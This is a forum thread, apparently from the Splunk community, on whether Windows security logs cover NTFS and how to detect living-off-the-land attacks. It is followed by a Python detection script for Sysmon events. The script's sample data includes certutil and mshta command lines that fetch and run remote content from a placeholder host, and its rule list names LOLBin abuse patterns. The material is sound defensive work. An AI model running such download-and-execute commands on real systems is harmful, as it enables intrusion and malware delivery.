
Windows logs - Do security logs also help to monitor NTFS?

debjit_k
Path Finder

Hi,

Hope you are doing well; I just have one doubt.

On our Splunk Windows setup, we have onboarded the security logs, so my doubt is: do security logs also help to monitor NTFS?

Thanks

Debjit


johnhuang
Motivator

Windows event logs do not monitor NTFS. You may be able to get Kerberos auth to file shares, but that's about it.


debjit_k
Path Finder

Hi,

So what kind of logs can have NTFS? Actually, I want to monitor LOL attacks.

Kindly guide me on whether we can create any UC using Windows security logs for LOL attacks.

Thanks


johnhuang
Motivator

For LOL or “Living off the Land” attacks, the ideal tool is an EDR/HIDS solution that provides you with raw logs, e.g. Carbon Black, or Sysmon, which is free.

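As an added illustration of the kind of use case the answer above points at (not code from the thread or from Splunk), here is a small Python detection pass over Sysmon Event ID 1 (process creation) records. The sample events, the field layout (the multi-line `Field: value` text that the Windows TA forwards), the rule names and the LOLBin patterns are all constructed for this example; the patterns themselves mirror public detection content for certutil, mshta, regsvr32 and rundll32 abuse and for Office applications spawning a shell. In Splunk you would express the same logic as a saved search over `sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational`; this script shows the matching logic itself so it can be reasoned about and tested offline.

```python
import re

# Constructed sample Sysmon Event ID 1 records in the multi-line text layout
# (Field: value per line) that Splunk's Windows add-on produces for WinEventLog.
# Hosts, users and URLs are placeholders; nothing here is from a real environment.
SAMPLE_EVENTS = [
    r"""EventCode=1
Image: C:\Windows\System32\certutil.exe
CommandLine: certutil.exe -urlcache -split -f http://example.invalid/file.txt C:\Users\Public\f.txt
ParentImage: C:\Windows\System32\cmd.exe
User: CORP\jdoe""",
    r"""EventCode=1
Image: C:\Windows\System32\certutil.exe
CommandLine: certutil.exe -hashfile C:\ISOs\image.iso SHA256
ParentImage: C:\Windows\System32\cmd.exe
User: CORP\admin""",
    r"""EventCode=1
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell.exe -NoProfile -WindowStyle Hidden -Command "Get-Date"
ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
User: CORP\jdoe""",
    r"""EventCode=1
Image: C:\Windows\System32\mshta.exe
CommandLine: mshta.exe http://example.invalid/launch.hta
ParentImage: C:\Windows\explorer.exe
User: CORP\jdoe""",
    r"""EventCode=3
Image: C:\Windows\System32\mshta.exe
DestinationIp: 203.0.113.10
User: CORP\jdoe""",
]

# (rule name, image basename, case-insensitive command-line pattern)
# Assumed rule set, modelled on widely published LOLBin detections.
LOLBIN_RULES = [
    ("certutil_remote_fetch", "certutil.exe", r"-urlcache|-decode"),
    ("mshta_remote_script", "mshta.exe", r"https?://|javascript:|vbscript:"),
    ("regsvr32_scriptlet", "regsvr32.exe", r"/i:https?://|scrobj\.dll"),
    ("rundll32_script", "rundll32.exe", r"javascript:|vbscript:"),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}


def parse_event(text):
    """Turn one 'Field: value' / 'Field=value' record into a dict."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^\s*(\w+)[:=]\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def basename(path):
    """Lower-cased file name from a Windows path (handles / and \\)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_lolbin(fields):
    """Return the list of rule names that fire for one parsed event."""
    hits = []
    image = basename(fields.get("Image", ""))
    cmd = fields.get("CommandLine", "")
    parent = basename(fields.get("ParentImage", ""))
    for name, binary, pattern in LOLBIN_RULES:
        if image == binary and re.search(pattern, cmd, re.IGNORECASE):
            hits.append(name)
    # Parent/child relationship rule: a document viewer launching a shell.
    if parent in OFFICE_PARENTS and image in SHELLS:
        hits.append("office_spawns_shell")
    return hits


def scan(events):
    """Map event index -> fired rules, considering only process-creation events."""
    results = {}
    for i, raw in enumerate(events):
        fields = parse_event(raw)
        if fields.get("EventCode") != "1":
            continue  # network/other Sysmon events are out of scope for these rules
        hits = match_lolbin(fields)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```

The benign `certutil -hashfile` record and the Event ID 3 network record are there on purpose: a useful rule set has to key on the argument pattern and the event type, not just on the binary name, or it drowns in false positives. The same matching can be written as SPL with `match()` on `CommandLine` and `ParentImage`, but the Python form is easier to unit-test against captured events before promoting it to a saved search.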